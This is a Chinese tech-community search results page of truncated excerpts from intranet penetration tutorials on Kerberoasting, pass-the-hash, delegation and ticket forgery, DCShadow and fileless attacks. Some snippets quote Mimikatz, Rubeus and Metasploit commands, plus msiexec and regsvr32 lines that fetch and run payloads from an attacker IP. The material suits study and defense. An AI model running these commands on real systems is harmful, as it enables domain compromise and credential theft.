首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏谢公子学安全

    内网渗透(四) | 域渗透之Kerberoast攻击

    以下文章来源于安全加 ,作者谢公子 作者:谢公子 CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。 Kerberoast攻击 kerberoast攻击发生在kerberos协议的TGS_REP阶段,关于kerberos协议详情,传送门:内网渗透 | 域内认证之Kerberos协议详解 Kerberoast 在服务票证请求(TGS-REQ)过程中,攻击者可以指定它们支持的Kerberos加密类型(RC4_HMAC,AES256_CTS_HMAC_SHA1_96等等)。 4.攻击者从 TGS-REP 中提取加密的服务票证。由于服务票证是用链接到请求 SPN 的帐户的哈希加密的,所以攻击者可以离线破解这个加密块,恢复帐户的明文密码。 kerberos::ptt PENTESTLAB.kirbi Kerberoast攻击防范 确保服务账号密码为强密码(长度、随机性、定期修改) 如果攻击者无法将默认的AES256_HMAC加密方式改为RC4

    1.9K30编辑于 2022-01-19
  • 来自专栏玄魂工作室

    CTF实战20 渗透测试-后渗透攻击

    重要声明 该培训中提及的技术只适用于合法CTF比赛和有合法授权的渗透测试,请勿用于其他非法用途,如用作其他非法用途与本文作者无关 我们今天进行一些理论知识的学习 顺便大家可以趁这段时间好好练习一下实战的操作 到这里我们想大家都已经成功进入了一台服务器或者获得了部分权限 不然就谈不上后渗透攻击了 后渗透攻击该做什么? ? ,固定格式 16 表示年份,即2016年发布的漏洞 001 表示顺序,即当年度发布的第1个漏洞 Windows提权exp使用方法: 将exp执行即可,一般情况下是使用cmd.exe来执行 在日常渗透测试过程中

    1.6K40发布于 2018-07-25
  • 来自专栏Java面试教程

    我被渗透攻击了

    ---- 我被渗透攻击了 人在家中坐,锅从天上来 本来明天是周末 今天我还在安静的敲着代码 想着晚上和女朋友去哪里吃饭 结果甲方一个紧急催命电话就打过来了 “我们被攻击了” 厚厚的一份报告 收到一份攻击渗透报告 诶不对 那试试888888 诶还不对 再试试 @#¥¥#%……@¥% ---10分钟后--- 算了还是找回密码吧 所以,我们需要在强密码和记忆方面找一个平衡 典型弱密码 网上有很多典型弱密码的攻击字典

    78910编辑于 2023-09-06
  • 来自专栏LuckySec网络安全

    内网渗透 - 哈希传递攻击

    前言 在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。 0x01 哈希传递攻击 哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。 如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。 通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码。 哈希传递攻击原理详解:https://www.4hou.com/posts/V0xO 工作组环境: Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。 518b98ad4178a53695dc997aa02d455c msf6 exploit(windows/smb/psexec) > exploit 参考文章 https://mp.weixin.qq.com/s/T5tJ3GkeNKmyFXyW4CEr1A

    1.4K60编辑于 2022-11-02
  • 来自专栏红蓝对抗

    什么是内网渗透委派攻击?

    1.2委派的分类:委派攻击分为三种攻击手段分别是非约束委派 攻击、约束委派攻击、基于资源委派攻击非约束委派攻击:在域内只有主机账号和服务账号才有委派属性 主机账号:活动目录中的computers组内的计算机 从攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境。 S4U2self可以代表自身请求针对其自身的可转发的Kerberos服务票据(ST1) ; S4U2proxy可以以用户的名义请求其它服务的ST2 ,约束委派就是限制了S4U2proxy扩展的范围。 在这种情况下,服务可以 调用S4U2Self来要求身份验证服务为其自身的任意用户生成TGS ,然后可以在调用S4U2Proxy时将其用作依据。 (尽量使用AES256)同样能够预防Kerberoast攻击

    81921编辑于 2024-07-24
  • 来自专栏红蓝对抗

    内网渗透 | 多种票据攻击详解

    这大大降低了攻击者访问域控制器的Active Directory的ntds.dit。 如果攻击者无法访问AD数据库(ntds.dit文件),则无法获取到KRBTGT帐户密码 禁用KRBTGT帐户,并保存当前的密码以及以前的密码。 这个过程应该是确保KRBTGT密码每年至少更改一次的标准方法 一旦攻击者获得了KRBTGT帐号密码哈希的访问权限,就可以随意创建黄金票据。 这将使所有Kerberos票据无效,并消除攻击者使用其KRBTGT创建有效金票的能力 三、SILVER TICKET 原理 如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在一个域林中,域控权限不是终点,根域的域控权限才是域渗透的终点。 突破限制 普通的黄金票据被限制在当前域内,在2015年Black Hat USA中国外的研究者提出了突破域限制的增强版的黄金票据。

    2.1K10编辑于 2024-08-23
  • 来自专栏红蓝对抗

    域渗透之委派攻击全集

    引入了两个新的概念 S4U2Self和S4U2Proxy S4U2self 允许受约束委派的服务代表任意用户向KDC请求服务自身,从而获得一张该用户(任意用户)的对当前受约束委派服务的票据TGS(ST) \10.150.127.166 5 21 1400638014 602433399 2258725660 1146 可以看到 用户是many WEB是被many加入域的 利用方式1:基于资源的约束委派攻击本地提权 123456 -spn CIFS/DC2.haishi.com -impersonate Administrator -dc-ip 10.150.127.166 导入 成功接管域控 ntlm-relay攻击的前提是 cve-2019-1040 在这里的作用是绕过了mic检验 因为打印机触发的是smb协议 域控是默认带有smb签名的 而cve漏洞在这里就刚好绕过了mic的检验 然后完成了ntlm-relay攻击 利用方式4 打造变种黄金票据 在获得域控的权限后 对krbtgt用户设置委派属性 来打造黄金票据 进行权限维持 先创建一个机器账户 test4 123456 然后来到域控上操作 在powershell

    1.6K10编辑于 2022-08-30
  • 来自专栏Khan安全团队

    红队笔记 - 域渗透攻击

    域持久性 必须以DA权限运行 Mimikatz攻击 DC运行为所有用户启用密码 "mimikatz" privilege::debug misc::skeleton 使用 cached credentials (if any) Get-RemoteCachedCredential -ComputerName DC01 DCShadow DCShadow是一种攻击 作为域管理员,可以选择给一个选定的用户以DCShadow攻击所需的权限(使用Set-DCShadowPermissions.ps1 cmdlet) Set-DCShadowPermissions -FakeDC BackdoorMachine -SamAccountName TargetUser -Username BackdoorUser -Verbose 然后,从任何一台机器上使用Mimikatz来进行DCShadow攻击 CCDCLCSWRPWPLOCRRCWDWO;;;[[S-1-5-21-1874506631-3219952063-538504511-45109]]) 最后,从DA会话或之前提供DCShadow权限的用户会话,运行DCShadow攻击

    1K30发布于 2021-10-12
  • 来自专栏网络

    【黑客渗透】-- 中间人攻击

    一、什么是中间人攻击? 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间 ,你作为正义使者你要渗透到他们的中间盗取他账号,从而渗透到后台成功破坏钓鱼网站 3)实验设备 kali 1台,windows Server 2003 1台;客户机 windows 7 (kali安装后续会讲解 ) 4)实验配置 1.实验设备均在VMnet 2中 2.实验设备IP Kali ip地址:10.1.1.2/24 Windows Server 2003 ip地址:10.1.1.3/24 DNS:10.1.1.3 </form> </body> </html> 上面是我们今天模拟的钓鱼网站后台登录页面代码,使用文本文件将内容放进去后再将文件后缀名的.txt更该为.html就可以了 搭建网站 4.

    63510编辑于 2024-10-17
  • 来自专栏网络空间安全

    内网渗透之哈希传递攻击

    欢迎关注我的微信公众号《壳中之魂》 大多数渗透测试人员都听说过哈希传递(Pass The Hash)攻击。该方法通过找到与账户相关的密码散列值(通常是 NTLM Hash)来进行攻击。 同时,通过哈希传递攻击攻击者不需要花时间破解哈希密在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来完成任务 NTLM Hash:ad5a870327c02f83cb947af6a94a4c23 哈希传递攻击 使用mimikatz 首先先dir一下域控制器的c盘,看看有没有权限 ? dir=in localport=3389 action=allow netsh advfirewall set allprofiles state off //关闭防火墙 使用msf 使用后渗透模块 我们在渗透过程中可以通过修改注册表的方式开启目标主机的Restricted Admin Mode,值为 0 代表开启,值为 1 代表关闭: REG ADD "HKLM\System\CurrentControlSet

    3.5K20发布于 2021-11-15
  • 来自专栏红蓝对抗

    内网渗透 | 多种传递攻击详解

    前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。 下载地址: https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec 主要有以下两种攻击方法 1.Psexec需建立ipc链接进行横向渗透 /administrator@192.168.3.144 二、利用impacket中的工具包进行横向渗透 1.PSExec(非官方自带)工具进行横向渗透 为了解决无法获取明文进行传递攻击的问题,使用非官方自带的 developer/article/1743842 建立IPC失败的原因 (1)目标系统不是NT或以上的操作系统 (2)对方没有打开IPC$共享 (3)对方未开启139、445端口,或者被防火墙屏蔽 (4) 1326:账号密码错误 (7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况 (8)2242:用户密码过期,目标有账号策略,强制定期更改密码 总结 在这里几乎将明文和hash传递横向渗透攻击写完了

    1.6K31编辑于 2024-08-23
  • 来自专栏网络安全攻防

    内网渗透之无文件落地攻击

    false exploit -j -z Step 3:使用python启动一个简易的Web服务器用于托管shell.exe python2 -m SimpleHTTPServer 1234 Step 4: nc监听端口 nc -lvp 6666 Step 4:在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Step 4: Step 3:将上述命令复制到目标主机上执行 regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll Step 4: Managementd的缩写,是一种允许管理员远程执行系统管理任务的服务,通信通过http(5985)或https soap(5986)执行,默认情况下支持Kerberos和NTLM身份验证以及基本身份验证,在内网渗透中不仅可以用于横向移动

    1.5K00编辑于 2024-12-24
  • 来自专栏HACK学习

    Kali linux 渗透攻击之社会工程学攻击

    无论是渗透测试人员还是诈骗专家、身份窃贼、商业合作伙伴等。 攻击过程 社会工程学工程师通常会采用这些方法来有效获取目标的有关信息和访问权限: (1)情报收集:多种技术都可以用于找到最容易攻破的渗透测试目标。 (4)执行攻击:社会工程学攻击的最后一步是执行攻击计划。此时,我们应该保持足够的信心和耐心,主动监控和评估工作的成果。 完成这一步之后,社会工程师掌握了充分的信息,甚至可以范围被测单位的内部系统,这些成果足以让他们进一步地渗透被测试的单位。在成功执行攻击计划之后,社会工程学的攻击就可宣告结束。 (4)啖以重利 人们常常说“机不可失”,他们特别关注所谓机不可失的宝贵机会。这些想法都是人性贪婪的一面写照。啖以重利的方法李永利人们个球谋利机会的贪婪心理。

    2.9K20发布于 2019-08-07
  • 来自专栏FreeBuf

    「无文件」攻击方式渗透实验

    这套环境里面的192.168.1.108是黑客的kali攻击机,192.168.1.212是黑客的windows攻击机 科普下nishang和PowerSploit 1、Nishang是基于PowerShell 的渗透测试专用工具。 这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。 的代理,浏览器可以用这个代理进入到内网,但是burp不能用socks4a的代理。 * 科普一下csrf的攻击:CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,简单来说攻击者盗用了你的身份,以你的名义发送恶意请求

    2.9K90发布于 2018-02-23
  • 来自专栏Bypass

    域渗透 | Kerberos攻击速查表

    AS_REP_responses_file> <passwords_file> john --wordlist=<passwords_file> <AS_REP_responses_file> 0x03 Kerberoasting攻击 \Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt# Execute a cmd in the To generate the TGS with NTLMmimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4: To generate the TGT with NTLMmimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4: > cmd 0x08 杂项 已知密码获取NTLM: python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4"

    2.3K20发布于 2020-01-02
  • 来自专栏HACK学习

    内网渗透 | SPN 与 Kerberoast 攻击讲解

    kerberoasting 前言 往期文章: 内网渗透 | Kerberos 协议与 Kerberos 认证原理 内网渗透 | Kerberos 协议相关安全问题分析与利用 在上一篇文章《内网渗透测试 :Kerberos 协议相关安全问题分析与利用》中,我们详细介绍了多种基于 Kerberos 协议进行的攻击,本节我们再来对 Kerberoast 攻击做一下介绍。 SPN 的识别与发现是 kerberoasting 攻击的第一步。 加密方式改为 RC4_HMAC_MD5,就无法尝试使用 tgsrepcrack.py 来破解密码。 •攻击者可以通过嗅探的方法抓取 Kerberos TGS 票据。

    5.2K30发布于 2021-07-21
  • 来自专栏用户7692554的专栏

    初学内网渗透之代理跳板攻击

    get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) 和扫描该网段下的主机 查看已经添加的路由:run autoroute -p 扫描该网段下的主机:run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24 4. 使用socket代理 先background把session挂在后台 命令:use auxiliary/server/socks4a (用set命令修改参数,如果端口被占用,可以改别的) 修改好后用 [aru_31] 5.最后利用代理打开msf进行跳板攻击 启动命令:proxychains msfconsole 使用ms17-010漏洞(因为是事先准备好的靶机,所以知道存在什么漏洞,不知道的情况下 ,大家只有去扫了) 注意:因为这里我们是用的代理去进行攻击的,所以payload需要设置成bind的,如:windows/x86/meterpreter/bind_tcp 设置好相关参数直接攻击就可以了

    1.4K10编辑于 2022-09-08
  • 来自专栏网站漏洞修补

    渗透测试攻击之APP漏洞检测

    越权问题是指应用程序对访问请求的权限检查出现漏洞,使攻击者在使用了未获得权限的用户账户之后,以某种方式绕过权限检查,以访问或操作其他用户或更高权限者的对象。 越权漏洞只能是通过渗透测试服务来手动检测才能检测出问题来,如果想要进行更详细的安全测试的话推荐国内网站安全公司SINESAFE,鹰盾安全,绿盟,大树安全等等这些安全公司来做详细的渗透测试服务。

    1K30发布于 2020-12-04
  • 来自专栏网络空间安全

    内网渗透横向移动之委派攻击

    协议,添加了s4u2self与s4u2proxy协议,以增加安全性。 注意,我们需要的是机器账户,原因是攻击的流程中会使用到S4U2Self协议,它只适用于有SPN账户,而不同账户是没有SPN的 获得一个可以修改msDS-AllowedToActOnBehalfOfOtherIdentity 基于资源的委派攻击 首先先登录刚才创建的join用户 1、查找可以攻击的目标 假设我们拿到一个域用户的帐户,我们想要进行基于资源的委派攻击,首先要先查看一下当前账户可以修改谁的msDS-AllowedToActOnBehalfOfOtherIdentity 5、攻击 使用Rubues Rubeus.exe hash /user:hack /password:hackyou /domain:g1ts.com //获取rc4的哈希 image.png Rubeus.exe 博客 域渗透——Kerberos委派攻击 - 先知社区 (aliyun.com) kerberos委派详解 - FreeBuf网络安全行业门户 (13条消息) 基于windows中委派的攻击思路(下)-

    1.8K60发布于 2021-11-23
  • 来自专栏谢公子学安全

    内网渗透(五) | AS-REP Roasting攻击

    作者:谢公子 CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。 AS-REP Roasting攻击 AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。 但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。 当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。 因此,攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。 AS-REP Roasting攻击条件 域用户设置了 “ Do not require Kerberos preauthentication(不需要kerberos预身份验证) ” 需要一台可与KDC进行通信的主机

    3.4K10编辑于 2022-01-19
领券